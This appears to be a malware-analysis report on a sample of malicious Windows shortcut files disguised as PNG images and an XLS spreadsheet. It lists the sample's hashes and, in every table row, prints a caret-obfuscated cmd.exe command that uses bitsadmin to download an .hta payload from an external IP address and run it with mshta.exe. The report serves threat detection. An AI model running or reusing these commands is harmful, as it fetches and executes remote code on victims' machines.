| Hash | Hash Value |
|---|---|
| MD5 | 93e7573b1e084c582da26c50723d2a0a |
| Sha1 | 1061685716467917d2a74e70bd344026e7a08908 |
| Sha256 | e516a52f9e1f70f23ab7fd6687e0c4e80a8802d547224e852b3a20864f04204d |
| Sha384 | 3c800823196bed90e892aeaf8e55023951e5a40539fbe610c417a689d159759259549ef79560c1eada4c4e45ee8ee200 |
| Sha512 | ca84623b8d71f55ac5bca84b466fc862a99e28aab03d89831e36cb2dc2e8ce8bb227e8d4c0a5da37a2c83602641d3bbdc2ccb06c00c6b4125f6372ef2b6ed890 |
| SSDeep | 96:Zjiwm1SKr1yNJ212V2pAtWwRCG/1s7CEw4n:Zjd7JHqCEw4n |
| TLSH | 0BD5126063FC5210E072CFB689215B45DBFBB4927BB2D3CA0761326C6E6172CDE12B25 |

| Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^h^x^y^6^W^g^q^D^S^6^r^u^V^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/operatingdescribe.hta ^%^T^E^M^P^%^\TBHxWYhhoiiddqTOTHz.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\TBHxWYhhoiiddqTOTHz.^h^t^a && cmd /c !mycmd! |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^Q^r^H^f^v^B^t^3^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/devilishsalty.hta ^%^T^E^M^P^%^\TmtWmnojyZmQiSusFR.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\TmtWmnojyZmQiSusFR.^h^t^a && cmd /c !mycmd! |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^H^D^E^Y^p^u^T^0^F^3^W^h^1^a^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/roosterscare.hta ^%^T^E^M^P^%^\vfZwDCKyptYNbqqzukJjXZ.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\vfZwDCKyptYNbqqzukJjXZ.^h^t^a && cmd /c !mycmd! |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^Z^t^b^R^X^r^4^v^g^s^G^V^L^B^a^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/mineralgoddess.hta ^%^T^E^M^P^%^\YMmeNqJmxlzaWhbVslfFj.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\YMmeNqJmxlzaWhbVslfFj.^h^t^a && cmd /c !mycmd! |

| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^h^x^y^6^W^g^q^D^S^6^r^u^V^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/operatingdescribe.hta ^%^T^E^M^P^%^\TBHxWYhhoiiddqTOTHz.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\TBHxWYhhoiiddqTOTHz.^h^t^a && cmd /c !mycmd! Malicious | 93e7573b1e084c582da26c50723d2a0a > PNG_0012.png.lnk |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^Q^r^H^f^v^B^t^3^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/devilishsalty.hta ^%^T^E^M^P^%^\TmtWmnojyZmQiSusFR.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\TmtWmnojyZmQiSusFR.^h^t^a && cmd /c !mycmd! Malicious | 93e7573b1e084c582da26c50723d2a0a > PNG_0013.png.lnk |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^H^D^E^Y^p^u^T^0^F^3^W^h^1^a^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/roosterscare.hta ^%^T^E^M^P^%^\vfZwDCKyptYNbqqzukJjXZ.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\vfZwDCKyptYNbqqzukJjXZ.^h^t^a && cmd /c !mycmd! Malicious | 93e7573b1e084c582da26c50723d2a0a > PNG_0014.png.lnk |
| LNK: Command Execution | cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^Z^t^b^R^X^r^4^v^g^s^G^V^L^B^a^ ^/^d^o^w^n^l^o^a^d^ http://163.5.102.98/SSzch/mineralgoddess.hta ^%^T^E^M^P^%^\YMmeNqJmxlzaWhbVslfFj.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\YMmeNqJmxlzaWhbVslfFj.^h^t^a && cmd /c !mycmd! Malicious | 93e7573b1e084c582da26c50723d2a0a > SpisokSZCH.xls.lnk |